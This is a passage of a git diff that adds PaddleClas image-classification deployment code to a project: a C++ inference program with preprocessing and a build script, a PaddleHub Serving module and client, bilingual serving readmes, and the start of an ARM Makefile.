+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include +#include +#include + +using namespace std; +using namespace cv; +using namespace PaddleClas; + +int main(int argc, char **argv) { + if (argc < 3) { + std::cerr << "[ERROR] usage: " << argv[0] + << " configure_filepath image_path\n"; + exit(1); + } + + ClsConfig config(argv[1]); + + config.PrintConfigInfo(); + + std::string path(argv[2]); + + std::vector img_files_list; + if (cv::utils::fs::isDirectory(path)) { + std::vector filenames; + cv::glob(path, filenames); + for (auto f : filenames) { + img_files_list.push_back(f); + } + } else { + img_files_list.push_back(path); + } + + std::cout << "img_file_list length: " << img_files_list.size() << std::endl; + + Classifier classifier(config.cls_model_path, config.cls_params_path, + config.use_gpu, config.gpu_id, config.gpu_mem, + config.cpu_threads, config.use_mkldnn, + config.use_tensorrt, config.use_fp16, + config.resize_short_size, config.crop_size); + + double elapsed_time = 0.0; + std::vector cls_times; + int warmup_iter = img_files_list.size() > 5 ? 5 : 0; + for (int idx = 0; idx < img_files_list.size(); ++idx) { + std::string img_path = img_files_list[idx]; + cv::Mat srcimg = cv::imread(img_path, cv::IMREAD_COLOR); + if (!srcimg.data) { + std::cerr << "[ERROR] image read failed! image path: " << img_path + << "\n"; + exit(-1); + } + + cv::cvtColor(srcimg, srcimg, cv::COLOR_BGR2RGB); + + double run_time = classifier.Run(srcimg, &cls_times); + if (idx >= warmup_iter) { + elapsed_time += run_time; + std::cout << "Current image path: " << img_path << std::endl; + std::cout << "Current time cost: " << run_time << " s, " + << "average time cost in all: " + << elapsed_time / (idx + 1 - warmup_iter) << " s." << std::endl; + } else { + std::cout << "Current time cost: " << run_time << " s." << std::endl; + } + } + + std::string presion = "fp32"; + + if (config.use_fp16) + presion = "fp16"; + if (config.benchmark) { + AutoLogger autolog("Classification", config.use_gpu, config.use_tensorrt, + config.use_mkldnn, config.cpu_threads, 1, + "1, 3, 224, 224", presion, cls_times, + img_files_list.size()); + autolog.report(); + } + return 0; +} diff --git a/Smart_container/PaddleClas/deploy/cpp/src/preprocess_op.cpp b/Smart_container/PaddleClas/deploy/cpp/src/preprocess_op.cpp new file mode 100644 index 0000000..72bdb81 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/preprocess_op.cpp @@ -0,0 +1,90 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" +#include "paddle_api.h" +#include "paddle_inference_api.h" +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include + +namespace PaddleClas { + +void Permute::Run(const cv::Mat *im, float *data) { + int rh = im->rows; + int rw = im->cols; + int rc = im->channels(); + for (int i = 0; i < rc; ++i) { + cv::extractChannel(*im, cv::Mat(rh, rw, CV_32FC1, data + i * rh * rw), i); + } +} + +void Normalize::Run(cv::Mat *im, const std::vector &mean, + const std::vector &scale, const bool is_scale) { + double e = 1.0; + if (is_scale) { + e /= 255.0; + } + (*im).convertTo(*im, CV_32FC3, e); + for (int h = 0; h < im->rows; h++) { + for (int w = 0; w < im->cols; w++) { + im->at(h, w)[0] = + (im->at(h, w)[0] - mean[0]) * scale[0]; + im->at(h, w)[1] = + (im->at(h, w)[1] - mean[1]) * scale[1]; + im->at(h, w)[2] = + (im->at(h, w)[2] - mean[2]) * scale[2]; + } + } +} + +void CenterCropImg::Run(cv::Mat &img, const int crop_size) { + int resize_w = img.cols; + int resize_h = img.rows; + int w_start = int((resize_w - crop_size) / 2); + int h_start = int((resize_h - crop_size) / 2); + cv::Rect rect(w_start, h_start, crop_size, crop_size); + img = img(rect); +} + +void ResizeImg::Run(const cv::Mat &img, cv::Mat &resize_img, + int resize_short_size) { + int w = img.cols; + int h = img.rows; + + float ratio = 1.f; + if (h < w) { + ratio = float(resize_short_size) / float(h); + } else { + ratio = float(resize_short_size) / float(w); + } + + int resize_h = round(float(h) * ratio); + int resize_w = round(float(w) * ratio); + + cv::resize(img, resize_img, cv::Size(resize_w, resize_h)); +} + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/src/utility.cpp b/Smart_container/PaddleClas/deploy/cpp/src/utility.cpp new file mode 100644 index 0000000..e6b572a --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/utility.cpp @@ -0,0 +1,39 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include +#include +#include + +#include + +namespace PaddleClas { + +std::vector Utility::ReadDict(const std::string &path) { + std::ifstream in(path); + std::string line; + std::vector m_vec; + if (in) { + while (getline(in, line)) { + m_vec.push_back(line); + } + } else { + std::cout << "no such label file: " << path << ", exit the program..." + << std::endl; + exit(1); + } + return m_vec; +} + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/tools/build.sh b/Smart_container/PaddleClas/deploy/cpp/tools/build.sh new file mode 100644 index 0000000..0a3aa04 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/tools/build.sh @@ -0,0 +1,20 @@ +OPENCV_DIR=/work/project/project/cpp_infer/opencv-3.4.7/opencv3 +LIB_DIR=/work/project/project/cpp_infer/paddle_inference/ +CUDA_LIB_DIR=/usr/local/cuda/lib64 +CUDNN_LIB_DIR=/usr/lib/x86_64-linux-gnu/ + +BUILD_DIR=build +rm -rf ${BUILD_DIR} +mkdir ${BUILD_DIR} +cd ${BUILD_DIR} +cmake .. \ + -DPADDLE_LIB=${LIB_DIR} \ + -DWITH_MKL=ON \ + -DWITH_GPU=OFF \ + -DWITH_STATIC_LIB=OFF \ + -DUSE_TENSORRT=OFF \ + -DOPENCV_DIR=${OPENCV_DIR} \ + -DCUDNN_LIB=${CUDNN_LIB_DIR} \ + -DCUDA_LIB=${CUDA_LIB_DIR} \ + +make -j diff --git a/Smart_container/PaddleClas/deploy/cpp/tools/config.txt b/Smart_container/PaddleClas/deploy/cpp/tools/config.txt new file mode 100644 index 0000000..0d915a9 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/tools/config.txt @@ -0,0 +1,17 @@ +# model load config +use_gpu 0 +gpu_id 0 +gpu_mem 4000 +cpu_threads 10 +use_mkldnn 1 +use_tensorrt 0 +use_fp16 0 + +# cls config +cls_model_path /PaddleClas/inference/cls_infer.pdmodel +cls_params_path /PaddleClas/inference/cls_infer.pdiparams +resize_short_size 256 +crop_size 224 + +# for log env info +benchmark 0 diff --git a/Smart_container/PaddleClas/deploy/cpp/tools/run.sh b/Smart_container/PaddleClas/deploy/cpp/tools/run.sh new file mode 100644 index 0000000..1c70aaa --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/tools/run.sh @@ -0,0 +1 @@ +./build/clas_system ./tools/config.txt ./docs/imgs/ILSVRC2012_val_00000666.JPEG diff --git a/Smart_container/PaddleClas/deploy/hubserving/clas/__init__.py b/Smart_container/PaddleClas/deploy/hubserving/clas/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/deploy/hubserving/clas/config.json b/Smart_container/PaddleClas/deploy/hubserving/clas/config.json new file mode 100644 index 0000000..647036f --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/clas/config.json @@ -0,0 +1,16 @@ +{ + "modules_info": { + "clas_system": { + "init_args": { + "version": "1.0.0", + "use_gpu": true, + "enable_mkldnn": false + }, + "predict_args": { + } + } + }, + "port": 8866, + "use_multiprocess": false, + "workers": 2 +} diff --git a/Smart_container/PaddleClas/deploy/hubserving/clas/module.py b/Smart_container/PaddleClas/deploy/hubserving/clas/module.py new file mode 100644 index 0000000..98ec1d9 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/clas/module.py @@ -0,0 +1,100 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import sys +sys.path.insert(0, ".") + +import time + +import numpy as np +import paddle.nn as nn +from paddlehub.module.module import moduleinfo, serving + +from hubserving.clas.params import get_default_confg +from python.predict_cls import ClsPredictor +from utils import config +from utils.encode_decode import b64_to_np + + +@moduleinfo( + name="clas_system", + version="1.0.0", + summary="class system service", + author="paddle-dev", + author_email="paddle-dev@baidu.com", + type="cv/class") +class ClasSystem(nn.Layer): + def __init__(self, use_gpu=None, enable_mkldnn=None): + """ + initialize with the necessary elements + """ + self._config = self._load_config( + use_gpu=use_gpu, enable_mkldnn=enable_mkldnn) + self.cls_predictor = ClsPredictor(self._config) + + def _load_config(self, use_gpu=None, enable_mkldnn=None): + cfg = get_default_confg() + cfg = config.AttrDict(cfg) + config.create_attr_dict(cfg) + if use_gpu is not None: + cfg.Global.use_gpu = use_gpu + if enable_mkldnn is not None: + cfg.Global.enable_mkldnn = enable_mkldnn + cfg.enable_benchmark = False + if cfg.Global.use_gpu: + try: + _places = os.environ["CUDA_VISIBLE_DEVICES"] + int(_places[0]) + print("Use GPU, GPU Memery:{}".format(cfg.Global.gpu_mem)) + print("CUDA_VISIBLE_DEVICES: ", _places) + except: + raise RuntimeError( + "Environment Variable CUDA_VISIBLE_DEVICES is not set correctly. If you wanna use gpu, please set CUDA_VISIBLE_DEVICES via export CUDA_VISIBLE_DEVICES=cuda_device_id." + ) + else: + print("Use CPU") + print("Enable MKL-DNN") if enable_mkldnn else None + return cfg + + def predict(self, inputs): + if not isinstance(inputs, list): + raise Exception( + "The input data is inconsistent with expectations.") + + starttime = time.time() + outputs = self.cls_predictor.predict(inputs) + elapse = time.time() - starttime + return {"prediction": outputs, "elapse": elapse} + + @serving + def serving_method(self, images, revert_params): + """ + Run as a service. + """ + input_data = b64_to_np(images, revert_params) + results = self.predict(inputs=list(input_data)) + return results + + +if __name__ == "__main__": + import cv2 + import paddlehub as hub + + module = hub.Module(name="clas_system") + img_path = "./hubserving/ILSVRC2012_val_00006666.JPEG" + img = cv2.imread(img_path)[:, :, ::-1] + img = cv2.resize(img, (224, 224)).transpose((2, 0, 1)) + res = module.predict([img.astype(np.float32)]) + print("The returned result of {}: {}".format(img_path, res)) diff --git a/Smart_container/PaddleClas/deploy/hubserving/clas/params.py b/Smart_container/PaddleClas/deploy/hubserving/clas/params.py new file mode 100644 index 0000000..9d9c0dd --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/clas/params.py @@ -0,0 +1,42 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + + +def get_default_confg(): + return { + 'Global': { + "inference_model_dir": "../inference/", + "batch_size": 1, + 'use_gpu': False, + 'use_fp16': False, + 'enable_mkldnn': False, + 'cpu_num_threads': 1, + 'use_tensorrt': False, + 'ir_optim': False, + "gpu_mem": 8000, + 'enable_profile': False, + "enable_benchmark": False + }, + 'PostProcess': { + 'main_indicator': 'Topk', + 'Topk': { + 'topk': 5, + 'class_id_map_file': './utils/imagenet1k_label_list.txt' + } + } + } diff --git a/Smart_container/PaddleClas/deploy/hubserving/readme.md b/Smart_container/PaddleClas/deploy/hubserving/readme.md new file mode 100644 index 0000000..6b2b2dd --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/readme.md @@ -0,0 +1,188 @@ +[English](readme_en.md) | 简体中文 + +# 基于PaddleHub Serving的服务部署 + +hubserving服务部署配置服务包`clas`下包含3个必选文件,目录如下: +``` +hubserving/clas/ + └─ __init__.py 空文件,必选 + └─ config.json 配置文件,可选,使用配置启动服务时作为参数传入 + └─ module.py 主模块,必选,包含服务的完整逻辑 + └─ params.py 参数文件,必选,包含模型路径、前后处理参数等参数 +``` + +## 快速启动服务 +### 1. 准备环境 +```shell +# 安装paddlehub,请安装2.0版本 +pip3 install paddlehub==2.1.0 --upgrade -i https://pypi.tuna.tsinghua.edu.cn/simple +``` + +### 2. 下载推理模型 +安装服务模块前,需要准备推理模型并放到正确路径,默认模型路径为: +``` +分类推理模型结构文件:PaddleClas/inference/inference.pdmodel +分类推理模型权重文件:PaddleClas/inference/inference.pdiparams +``` + +**注意**: +* 模型文件路径可在`PaddleClas/deploy/hubserving/clas/params.py`中查看和修改: + ```python + "inference_model_dir": "../inference/" + ``` + 需要注意,模型文件(包括.pdmodel与.pdiparams)名称必须为`inference`。 +* 我们也提供了大量基于ImageNet-1k数据集的预训练模型,模型列表及下载地址详见[模型库概览](../../docs/zh_CN/models/models_intro.md),也可以使用自己训练转换好的模型。 + +### 3. 安装服务模块 +针对Linux环境和Windows环境,安装命令如下。 + +* 在Linux环境下,安装示例如下: +```shell +cd PaddleClas/deploy +# 安装服务模块: +hub install hubserving/clas/ +``` + +* 在Windows环境下(文件夹的分隔符为`\`),安装示例如下: + +```shell +cd PaddleClas\deploy +# 安装服务模块: +hub install hubserving\clas\ +``` + +### 4. 启动服务 +#### 方式1. 命令行命令启动(仅支持CPU) +**启动命令:** +```shell +$ hub serving start --modules Module1==Version1 \ + --port XXXX \ + --use_multiprocess \ + --workers \ +``` + +**参数:** +|参数|用途| +|-|-| +|--modules/-m| [**必选**] PaddleHub Serving预安装模型,以多个Module==Version键值对的形式列出
*`当不指定Version时,默认选择最新版本`*| +|--port/-p| [**可选**] 服务端口,默认为8866| +|--use_multiprocess| [**可选**] 是否启用并发方式,默认为单进程方式,推荐多核CPU机器使用此方式
*`Windows操作系统只支持单进程方式`*| +|--workers| [**可选**] 在并发方式下指定的并发任务数,默认为`2*cpu_count-1`,其中`cpu_count`为CPU核数| + +如按默认参数启动服务: ```hub serving start -m clas_system``` + +这样就完成了一个服务化API的部署,使用默认端口号8866。 + +#### 方式2. 配置文件启动(支持CPU、GPU) +**启动命令:** +```hub serving start -c config.json``` + +其中,`config.json`格式如下: +```json +{ + "modules_info": { + "clas_system": { + "init_args": { + "version": "1.0.0", + "use_gpu": true, + "enable_mkldnn": false + }, + "predict_args": { + } + } + }, + "port": 8866, + "use_multiprocess": false, + "workers": 2 +} +``` + +- `init_args`中的可配参数与`module.py`中的`_initialize`函数接口一致。其中, + - 当`use_gpu`为`true`时,表示使用GPU启动服务。 + - 当`enable_mkldnn`为`true`时,表示使用MKL-DNN加速。 +- `predict_args`中的可配参数与`module.py`中的`predict`函数接口一致。 + +**注意:** +- 使用配置文件启动服务时,其他参数会被忽略。 +- 如果使用GPU预测(即,`use_gpu`置为`true`),则需要在启动服务之前,设置CUDA_VISIBLE_DEVICES环境变量,如:```export CUDA_VISIBLE_DEVICES=0```,否则不用设置。 +- **`use_gpu`不可与`use_multiprocess`同时为`true`**。 +- **`use_gpu`与`enable_mkldnn`同时为`true`时,将忽略`enable_mkldnn`,而使用GPU**。 + +如,使用GPU 3号卡启动串联服务: +```shell +cd PaddleClas/deploy +export CUDA_VISIBLE_DEVICES=3 +hub serving start -c hubserving/clas/config.json +``` + +## 发送预测请求 +配置好服务端,可使用以下命令发送预测请求,获取预测结果: + +```shell +cd PaddleClas/deploy +python hubserving/test_hubserving.py server_url image_path +``` + +需要给脚本传递2个必须参数: +- **server_url**:服务地址,格式为 +`http://[ip_address]:[port]/predict/[module_name]` +- **image_path**:测试图像路径,可以是单张图片路径,也可以是图像集合目录路径。 +- **batch_size**:[**可选**] 以`batch_size`大小为单位进行预测,默认为`1`。 +- **resize_short**:[**可选**] 预处理时,按短边调整大小,默认为`256`。 +- **crop_size**:[**可选**] 预处理时,居中裁剪的大小,默认为`224`。 +- **normalize**:[**可选**] 预处理时,是否进行`normalize`,默认为`True`。 +- **to_chw**:[**可选**] 预处理时,是否调整为`CHW`顺序,默认为`True`。 + +**注意**:如果使用`Transformer`系列模型,如`DeiT_***_384`, `ViT_***_384`等,请注意模型的输入数据尺寸,需要指定`--resize_short=384 --crop_size=384`。 + + +访问示例: +```shell +python hubserving/test_hubserving.py --server_url http://127.0.0.1:8866/predict/clas_system --image_file ./hubserving/ILSVRC2012_val_00006666.JPEG --batch_size 8 +``` + +### 返回结果格式说明 +返回结果为列表(list),包含top-k个分类结果,以及对应的得分,还有此图片预测耗时,具体如下: +``` +list: 返回结果 +└─ list: 第一张图片结果 + └─ list: 前k个分类结果,依score递减排序 + └─ list: 前k个分类结果对应的score,依score递减排序 + └─ float: 该图分类耗时,单位秒 +``` + +**说明:** 如果需要增加、删除、修改返回字段,可对相应模块进行修改,完整流程参考下一节自定义修改服务模块。 + +## 自定义修改服务模块 +如果需要修改服务逻辑,你一般需要操作以下步骤: + +- 1、 停止服务 +```hub serving stop --port/-p XXXX``` + +- 2、 到相应的`module.py`和`params.py`等文件中根据实际需求修改代码。`module.py`修改后需要重新安装(`hub install hubserving/clas/`)并部署。在进行部署前,可通过`python hubserving/clas/module.py`测试已安装服务模块。 + +- 3、 卸载旧服务包 +```hub uninstall clas_system``` + +- 4、 安装修改后的新服务包 +```hub install hubserving/clas/``` + +- 5、重新启动服务 +```hub serving start -m clas_system``` + +**注意**: +常用参数可在[params.py](./clas/params.py)中修改: + * 更换模型,需要修改模型文件路径参数: + ```python + "inference_model_dir": + ``` + * 更改后处理时返回的`top-k`结果数量: + ```python + 'topk': + ``` + * 更改后处理时的lable与class id对应映射文件: + ```python + 'class_id_map_file': + ``` + +为了避免不必要的延时以及能够以batch_size进行预测,数据预处理逻辑(包括resize、crop等操作)在客户端完成,因此需要在[test_hubserving.py](./test_hubserving.py#L35-L52)中修改。 diff --git a/Smart_container/PaddleClas/deploy/hubserving/readme_en.md b/Smart_container/PaddleClas/deploy/hubserving/readme_en.md new file mode 100644 index 0000000..bb0ddbd --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/readme_en.md @@ -0,0 +1,199 @@ +English | [简体中文](readme.md) + +# Service deployment based on PaddleHub Serving + +HubServing service pack contains 3 files, the directory is as follows: +``` +hubserving/clas/ + └─ __init__.py Empty file, required + └─ config.json Configuration file, optional, passed in as a parameter when using configuration to start the service + └─ module.py Main module file, required, contains the complete logic of the service + └─ params.py Parameter file, required, including parameters such as model path, pre- and post-processing parameters +``` + +## Quick start service +### 1. Prepare the environment +```shell +# Install version 2.0 of PaddleHub +pip3 install paddlehub==2.1.0 --upgrade -i https://pypi.tuna.tsinghua.edu.cn/simple +``` + +### 2. Download inference model +Before installing the service module, you need to prepare the inference model and put it in the correct path. The default model path is: + +``` +Model structure file: PaddleClas/inference/inference.pdmodel +Model parameters file: PaddleClas/inference/inference.pdiparams +``` + +* The model file path can be viewed and modified in `PaddleClas/deploy/hubserving/clas/params.py`. + + It should be noted that the prefix of model structure file and model parameters file must be `inference`. + +* More models provided by PaddleClas can be obtained from the [model library](../../docs/en/models/models_intro_en.md). You can also use models trained by yourself. + +### 3. Install Service Module + +* On Linux platform, the examples are as follows. +```shell +cd PaddleClas/deploy +hub install hubserving/clas/ +``` + +* On Windows platform, the examples are as follows. +```shell +cd PaddleClas\deploy +hub install hubserving\clas\ +``` + +### 4. Start service +#### Way 1. Start with command line parameters (CPU only) + +**start command:** +```shell +$ hub serving start --modules Module1==Version1 \ + --port XXXX \ + --use_multiprocess \ + --workers \ +``` +**parameters:** + +|parameters|usage| +|-|-| +|--modules/-m|PaddleHub Serving pre-installed model, listed in the form of multiple Module==Version key-value pairs
*`When Version is not specified, the latest version is selected by default`*| +|--port/-p|Service port, default is 8866| +|--use_multiprocess|Enable concurrent mode, the default is single-process mode, this mode is recommended for multi-core CPU machines
*`Windows operating system only supports single-process mode`*| +|--workers|The number of concurrent tasks specified in concurrent mode, the default is `2*cpu_count-1`, where `cpu_count` is the number of CPU cores| + +For example, start the 2-stage series service: +```shell +hub serving start -m clas_system +``` + +This completes the deployment of a service API, using the default port number 8866. + +#### Way 2. Start with configuration file(CPU、GPU) +**start command:** +```shell +hub serving start --config/-c config.json +``` +Wherein, the format of `config.json` is as follows: +```json +{ + "modules_info": { + "clas_system": { + "init_args": { + "version": "1.0.0", + "use_gpu": true, + "enable_mkldnn": false + }, + "predict_args": { + } + } + }, + "port": 8866, + "use_multiprocess": false, + "workers": 2 +} +``` +- The configurable parameters in `init_args` are consistent with the `_initialize` function interface in `module.py`. Among them, + - when `use_gpu` is `true`, it means that the GPU is used to start the service. + - when `enable_mkldnn` is `true`, it means that use MKL-DNN to accelerate. +- The configurable parameters in `predict_args` are consistent with the `predict` function interface in `module.py`. + +**Note:** +- When using the configuration file to start the service, other parameters will be ignored. +- If you use GPU prediction (that is, `use_gpu` is set to `true`), you need to set the environment variable CUDA_VISIBLE_DEVICES before starting the service, such as: ```export CUDA_VISIBLE_DEVICES=0```, otherwise you do not need to set it. +- **`use_gpu` and `use_multiprocess` cannot be `true` at the same time.** +- **When both `use_gpu` and `enable_mkldnn` are set to `true` at the same time, GPU is used to run and `enable_mkldnn` will be ignored.** + +For example, use GPU card No. 3 to start the 2-stage series service: +```shell +cd PaddleClas/deploy +export CUDA_VISIBLE_DEVICES=3 +hub serving start -c hubserving/clas/config.json +``` + +## Send prediction requests +After the service starts, you can use the following command to send a prediction request to obtain the prediction result: +```shell +cd PaddleClas/deploy +python hubserving/test_hubserving.py server_url image_path +``` + +Two required parameters need to be passed to the script: +- **server_url**: service address,format of which is +`http://[ip_address]:[port]/predict/[module_name]` +- **image_path**: Test image path, can be a single image path or an image directory path +- **batch_size**: [**Optional**] batch_size. Default by `1`. +- **resize_short**: [**Optional**] In preprocessing, resize according to short size. Default by `256`。 +- **crop_size**: [**Optional**] In preprocessing, centor crop size. Default by `224`。 +- **normalize**: [**Optional**] In preprocessing, whether to do `normalize`. Default by `True`。 +- **to_chw**: [**Optional**] In preprocessing, whether to transpose to `CHW`. Default by `True`。 + +**Notice**: +If you want to use `Transformer series models`, such as `DeiT_***_384`, `ViT_***_384`, etc., please pay attention to the input size of model, and need to set `--resize_short=384`, `--crop_size=384`. + +**Eg.** +```shell +python hubserving/test_hubserving.py --server_url http://127.0.0.1:8866/predict/clas_system --image_file ./hubserving/ILSVRC2012_val_00006666.JPEG --batch_size 8 +``` + +### Returned result format +The returned result is a list, including the `top_k`'s classification results, corresponding scores and the time cost of prediction, details as follows. + +``` +list: The returned results +└─ list: The result of first picture + └─ list: The top-k classification results, sorted in descending order of score + └─ list: The scores corresponding to the top-k classification results, sorted in descending order of score + └─ float: The time cost of predicting the picture, unit second +``` + +**Note:** If you need to add, delete or modify the returned fields, you can modify the corresponding module. For the details, refer to the user-defined modification service module in the next section. + +## User defined service module modification +If you need to modify the service logic, the following steps are generally required: + +1. Stop service +```shell +hub serving stop --port/-p XXXX +``` + +2. Modify the code in the corresponding files, like `module.py` and `params.py`, according to the actual needs. You need re-install(hub install hubserving/clas/) and re-deploy after modifing `module.py`. +After modifying and installing and before deploying, you can use `python hubserving/clas/module.py` to test the installed service module. + +For example, if you need to replace the model used by the deployed service, you need to modify model path parameters `cfg.model_file` and `cfg.params_file` in `params.py`. Of course, other related parameters may need to be modified at the same time. Please modify and debug according to the actual situation. + +3. Uninstall old service module +```shell +hub uninstall clas_system +``` + +4. Install modified service module +```shell +hub install hubserving/clas/ +``` + +5. Restart service +```shell +hub serving start -m clas_system +``` + +**Note**: + +Common parameters can be modified in params.py: +* Directory of model files(include model structure file and model parameters file): + ```python + "inference_model_dir": + ``` +* The number of Top-k results returned during post-processing: + ```python + 'topk': + ``` +* Mapping file corresponding to label and class ID during post-processing: + ```python + 'class_id_map_file': + ``` + +In order to avoid unnecessary delay and be able to predict in batch, the preprocessing (include resize, crop and other) is completed in the client, so modify [test_hubserving.py](./test_hubserving.py#L35-L52) if necessary. diff --git a/Smart_container/PaddleClas/deploy/hubserving/test_hubserving.py b/Smart_container/PaddleClas/deploy/hubserving/test_hubserving.py new file mode 100644 index 0000000..e5d2aca --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/test_hubserving.py @@ -0,0 +1,165 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +import time +import requests +import json +import base64 +import argparse + +import numpy as np +import cv2 + +from utils import logger +from utils.get_image_list import get_image_list +from utils import config +from utils.encode_decode import np_to_b64 +from python.preprocess import create_operators + + +def get_args(): + def str2bool(v): + return v.lower() in ("true", "t", "1") + + parser = argparse.ArgumentParser() + parser.add_argument("--server_url", type=str) + parser.add_argument("--image_file", type=str) + parser.add_argument("--batch_size", type=int, default=1) + parser.add_argument("--resize_short", type=int, default=256) + parser.add_argument("--crop_size", type=int, default=224) + parser.add_argument("--normalize", type=str2bool, default=True) + parser.add_argument("--to_chw", type=str2bool, default=True) + return parser.parse_args() + + +class PreprocessConfig(object): + def __init__(self, + resize_short=256, + crop_size=224, + normalize=True, + to_chw=True): + self.config = [{ + 'ResizeImage': { + 'resize_short': resize_short + } + }, { + 'CropImage': { + 'size': crop_size + } + }] + if normalize: + self.config.append({ + 'NormalizeImage': { + 'scale': 0.00392157, + 'mean': [0.485, 0.456, 0.406], + 'std': [0.229, 0.224, 0.225], + 'order': '' + } + }) + if to_chw: + self.config.append({'ToCHWImage': None}) + + def __call__(self): + return self.config + + +def main(args): + image_path_list = get_image_list(args.image_file) + headers = {"Content-type": "application/json"} + preprocess_ops = create_operators( + PreprocessConfig(args.resize_short, args.crop_size, args.normalize, + args.to_chw)()) + + cnt = 0 + predict_time = 0 + all_score = 0.0 + start_time = time.time() + + img_data_list = [] + img_name_list = [] + cnt = 0 + for idx, img_path in enumerate(image_path_list): + img = cv2.imread(img_path) + if img is None: + logger.warning( + f"Image file failed to read and has been skipped. The path: {img_path}" + ) + continue + else: + for ops in preprocess_ops: + img = ops(img) + img = np.array(img) + img_data_list.append(img) + + img_name = img_path.split('/')[-1] + img_name_list.append(img_name) + cnt += 1 + if cnt % args.batch_size == 0 or (idx + 1) == len(image_path_list): + inputs = np.array(img_data_list) + b64str, revert_shape = np_to_b64(inputs) + data = { + "images": b64str, + "revert_params": { + "shape": revert_shape, + "dtype": str(inputs.dtype) + } + } + try: + r = requests.post( + url=args.server_url, + headers=headers, + data=json.dumps(data)) + r.raise_for_status + if r.json()["status"] != "000": + msg = r.json()["msg"] + raise Exception(msg) + except Exception as e: + logger.error(f"{e}, in file(s): {img_name_list[0]} etc.") + continue + else: + results = r.json()["results"] + preds = results["prediction"] + elapse = results["elapse"] + + cnt += len(preds) + predict_time += elapse + + for number, result_list in enumerate(preds): + all_score += result_list["scores"][0] + pred_str = ", ".join( + [f"{k}: {result_list[k]}" for k in result_list]) + logger.info( + f"File:{img_name_list[number]}, The result(s): {pred_str}" + ) + + finally: + img_data_list = [] + img_name_list = [] + + total_time = time.time() - start_time + logger.info("The average time of prediction cost: {:.3f} s/image".format( + predict_time / cnt)) + logger.info("The average time cost: {:.3f} s/image".format(total_time / + cnt)) + logger.info("The average top-1 score: {:.3f}".format(all_score / cnt)) + + +if __name__ == '__main__': + args = get_args() + main(args) diff --git a/Smart_container/PaddleClas/deploy/lite/Makefile b/Smart_container/PaddleClas/deploy/lite/Makefile new file mode 100644 index 0000000..f18864a --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/Makefile @@ -0,0 +1,68 @@ +ARM_ABI = arm8 +export ARM_ABI + +include ../Makefile.def + +LITE_ROOT=../../../ + +THIRD_PARTY_DIR=${LITE_ROOT}/third_party + +OPENCV_VERSION=opencv4.1.0 + +ifeq (${ARM_ABI}, arm8) + ARM_PATH=arm64-v8a +endif +ifeq (${ARM_ABI}, arm7) + ARM_PATH=armeabi-v7a +endif + +OPENCV_LIBS = ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/libs/libopencv_imgcodecs.a \ + 